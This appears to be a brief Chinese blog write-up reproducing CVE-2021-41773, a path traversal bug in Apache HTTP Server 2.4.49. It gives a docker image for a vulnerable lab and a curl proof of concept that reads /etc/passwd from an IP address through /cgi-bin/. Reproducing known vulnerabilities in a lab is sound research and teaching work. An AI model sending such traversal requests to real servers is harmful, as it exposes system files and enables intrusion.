影响版本
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现
1.使⽤poc
curl http://1.15.136.212:8080/cgi-bin/../../../../etc/passwd
相关推荐
小郑加油2 小时前
python学习Day6-7天:条件判断与基本综合应用架构源启2 天前
深度解析:Spring Boot + Apache OpenNLP 构建企业级 NLU 系统SeaTunnel2 天前
深度解析 Apache SeaTunnel 核心引擎三大技术创新:高可靠异步持久化与 CDC 架构优化实战DolphinScheduler社区2 天前
第 8 篇|Apache DolphinScheduler 与 Flink Spark 数据引擎的边界、协同与最佳实践Apache IoTDB3 天前
Apache IoTDB V2.0.8 发布|新增模型并发推理,优化同步配置与安全加固蓝魔Y3 天前
Apache—Kafka实践Pocker_Spades_A4 天前
时序数据库选型指南:容量规划与压测方法(以 Apache IoTDB 为例)云计算老刘5 天前
Keepalived + LVS(DR)+ Apache + NFS羑悻的小杀马特5 天前
工业时序数据库选型:从数据模型与存储引擎看 Apache IoTDBJermy Li5 天前
HugeGraph 正式晋升 Apache 顶级项目:重塑「图 + AI」底座